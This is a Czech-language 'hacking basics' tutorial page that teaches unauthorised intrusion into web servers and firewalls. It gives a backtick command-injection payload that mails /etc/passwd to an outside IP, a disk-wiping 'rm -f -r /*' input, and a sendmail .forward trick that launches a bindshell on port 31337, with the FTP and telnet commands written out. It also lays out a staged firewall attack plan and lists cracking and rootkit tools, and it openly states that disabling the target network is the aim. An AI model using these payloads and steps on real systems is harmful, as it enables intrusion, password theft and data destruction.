Základy HACKU 3 :D

Základy hacku 3.  Vraťme se zpátky k fenoménu dneška a to je WWW

Jak známo většina internetových serverů pracuje pod systémem UNIX (LINUX).A ty používají hlavně www server Apache.Zavádející historický pokus o zabezpečení bylo to že k portům menším než 1024 se smí připojit jen superuživatel root. Jak známo tak httpd naslouchá na portu 80.To znamená že alespoň jednou musí být server spuštěn jako root.A tady je naše šance.Může se stát že administrátor spustí i kopie serveru jako root(nejnovejší verze Apache to již neumožňuje). WWW server nám pošle formulář v HTML skriptu.Náš počítač formulář interpretuje a zobrazí ho na obrazovce.My jej vyplníme a poté stiskneme tlačítko Submit.Náš počítač pak pošle formulář zpět na server,kde se vyvolá URL,k jehož konci je připojen obsah formuláře.Server je nastaven tak aby toto URL spouštělo skript přidávající obsah formuláře do souboru. Část tohoto skriptu může vypadat takto: echo "You have sent the following message: $MESSAGE" Smyslem je aby nám server poslal potvrzující hlášení,ve kterém se vše,co jsme napsali,cituje v řetězci $MESSAGE. Pokud my budeme vychytralý,napíšeme jako obsah $MESSAGE následující text: 'mail 193.179.4.2 /etc/passwd' Protože zpětné uvozovky jsou interpretem systému UNIX považovány za omezovače příkazů,může tento text mít natolik alarmující důsledek jako odeslání super tajného hesla k nám. Nebo chcete-li na serveru úplně vyčistit pevný disk můžeme napsat: 'rm -f -r /*' Ještě jedna finta.Jedná se o velmi starou fintu se souborem .forward Jestliže nemáte přístup do shellu ale jenom přes ftp,pak je to přímo ideální situace pro použití souboru .forward. Stačí uploadovat soubor.forward do domácího adresáře.Sendmail totiž standardně umožňuje execování souborů.Vyrobíme následující .forvard soubor $ cat .forward |/tmp/scriptik $ Tento soubor je třeba uploadovat do domácího adresáře.Pak si vytvoříme soubor "scriptik". $ cat scriptik /tmp/bindshell & $ Bindshell je program který hodí shell na port 31337.Aby se faily mohly exnout musí být executable.Můžeme to udělat takto: $ ftp -nv ftp> o server.provider.cz Conected to server.pro vider.cz ftp> user login heslo ftp> cd /tmp ftp> quote site chmod 755 bindshell ftp> quote site chmod 755 scriptik ftp> close Potom stačí na toto konto poslat nějaký mail.Sendmail spustí /tmp/scriptik a ten spustí bindshell. Pak se telnetem připojíme na port 31337 např. takto: $ telnet 193.179.4.2 31337 A dostanete se shellu.Pak můžete zadat tento příkaz: cat /etc/passwd > /home/ftp/incoming/ukradena_hesla Tímto se obsah tajného souboru passwd přenese do souboru ukradena_hesla v adresáři incoming. Pak na soubor passwd pustíme program John the Ripper a máme hesel dostatek. Možná i účet roota.Ještě se může stát že anonymní adresář má nastaveny práva na 777.Pak by to byl čistý vnější průnik. Část třetí-Útok na firewall(FW) Útočná metodologie uvažuje čtyři různé úrovně útoku na FW.První úroveň spočívá v pokusu o nenápadné získání informací,které mohou posloužit v další vlně útoku.Druhá úroveň útoku představuje již patrný bezprostřední sběr informací,ale ještě ne aktivní pokus o průnik do sítě.Třetí úroveň útoku s e pokouší zdolat FW a narušit za ním lokalizované klienty,přičemž toto úsilí je inicializováno z klienta vně napadené sítě.Čtvrtá úroveň útoku pak představuje pokus narušit bezpečnostní software FW,jeho konfiguraci nebo operační systém z klienta uvnitř atakované sítě.

1)První úroveň útoku. Jde o pokus získat informace o cílové síti,napadení z vnějších zdrojů tak aby se o tom cílová organizace nedozvěděla.Prvním krokem je zkontrolovat vstup do databáze na Network Information Centre (NIC).Použijeme telnet do rs.internic.net a pak zadáme příkaz whois.To nám poskytne informace o adresách a lokalitách.Bude nám to také naznačovat složitost cílových skupin sítě.Jestliže administrativní kontakt je shodný se zónou a technickým kontaktem,pak to může znamenat,že síťové skupiny mohou být v Internetu malé a relativně nové.Jestliže cílové organizace nemají svůj vlastní nameserver,pak je organizace asi malá a relativně krátkou dobu připojená do Internetu.Příkaz whois vylistuje primární a sekundární nameservery spolu s doménovým jménem. Poznámka:(lze použít i www přes http://rs.internic.net) Dalším krokem v této první úrovni je použití příkazu nslookup abychom získali maximum informací o cílové organizaci.Připojíme se raději k sekundárnímu nameserveru než k primárnímu a pokuste s e o tak zvaný zone transfer.Jestliže je zóne transfer povolen,budeme mít velice cenné informace o vnitřní cílové síti. Tak lze zjistit počet stanic a topologii cílové sítě.Zóne transwer je však ve většině sítí zakázán.Příkazem nslookup můžeme zjistit spoustu dalších informací,např.po použití příkazu set type=MX můžeme zjistit konfiguraci pošty a IP adresy poštovní serverů atd.Posledním krokem této úrovně je hledání veřejně přístupných informací o cílové organizaci.Velkým zdrojem informací mohou být výroční zprávy a obchodní publikace,spojení s jinými organizacemi atd.Tyto informace mohou být užitečné ze kterých kanálů útočit.

2)Druhá úroveň útoku. Sondování již může být objeveno cílovou organizací.Prvním krokem je pokus přenos DNS zóny z primárního name serveru,ačkoli většina organizací přenos zóny zakazuje,jak bylo řečeno výše.Ten kdo na FW útočí musí v dalším kroku vyhledat sítě a v nich konkrétní uzly.Zabere to hodně času,zvlášť pokud je síť za FW rozlehlá.Tento krok lze i při nedostatku času přeskočit Pro vyhledávání existují dvě metody. PING POKUS PŘIPOJIT SE NA TCP PORT 25 Směrovače mohou ztratit ICMP pakety,proto je žádoucí abychom posílali nejméně tři pakety na každou adresu.Osobně doporučuji pět paketů. Připojení na TCP port je pomalejší,protože spojení čeká na time-out jestliže je adresa nedostupná.Každý uzel který odpoví,je pak potenciálním bodem vstupu do vnitřní sítě.Tímto způsobem si vytvoříme seznam potenciálních uzlů (cílů) a měli bychom zjistit,jaké služby na nich běží. Předpokládá to uskutečnění připojení na každý TCP port na každé cílové stanici.

3)Třetí úroveň útoku a následující proniknutí. Tato metodologie předpokládá,že v tomto okamžiku máme k dispozici seznam uzlů a služeb vnitřní sítě z FW,teprve potom můžeme zahájit útok. Existují dva druhy útoků:
a) získání přístupu do shellu FW (dokonce se můžeme stát správci systému),
b) použití vzdálených služeb,které jsou k dispozici prostřednictvím FW a které změní kritické konfigurační soubory nebo modifikují služby,které běží na FW. Na FW často běží služba (např.mail démon),která není dostatečně zabezpečená Tyto služby se stanou prvním cílem útoku.Mnoho FW má slabinu syslogd,jiné dovolují spojení telnetem z adres IP externích sítí.Ještě lepší je když na FW je velký počet neaktivních účtů,které měli být dávno vymazány. Dokonce i když je FW odolný proti proniknutí z externích lokalit,vnitřní uzly a uzly v demilitarizované zóně (DMZ)jsou často přístupné z vnější sítě.Už takto kvalifikované útoky mohou způsobit nefunkčnost napadené sítě.A to nám přeci jde.Po té jsme uskutečnili veškeré útoky proti FW,je nutno obrátit pozornost na uzly v cílové síti.Zkusíme telnet popř.rlogin pokusíme se získat přístup do shellu.Další možností získání přístupu je využít slabiny v NFS,NIS a sendmailu.Velkou službu nám udělají hackerské nástroje,které jsou dostupné na mnoha FTP serverech.Proniknutí do je dnoho uzlu interní sítě akceleruje proces proniknutí do celé vnitřní sítě.Je tomu tak proto,že uzly v TCP/IP nemají mezi sebou zabezpečené vztahy.

4)Modifikace FW. Jde o napadení FW s cílem modifikovat FW,povolit volný přístup a jednoduchý přístup do vnitřní sítě.Nainstalujeme program "sniffer" do segmentu sítě, kde je FW který čeká na přihlášení administrátora. Některé hackerské programy:SATAN-program pro pátrání po bezpečnostních chybách ve www serverech. CRACK-louskač hesel. ROOTKIT-Nástroj pro privilegovaný přístup do systému UNIX (LINUX). TAP-Analyzuje packety. WINNUKE-Dálkově resetuje www servery pod Win NT.

Vyhledávání

© 2008 Všechna práva vyhrazena.Projekt by Dandy_CZ & Petr Kubiš..

TOPlist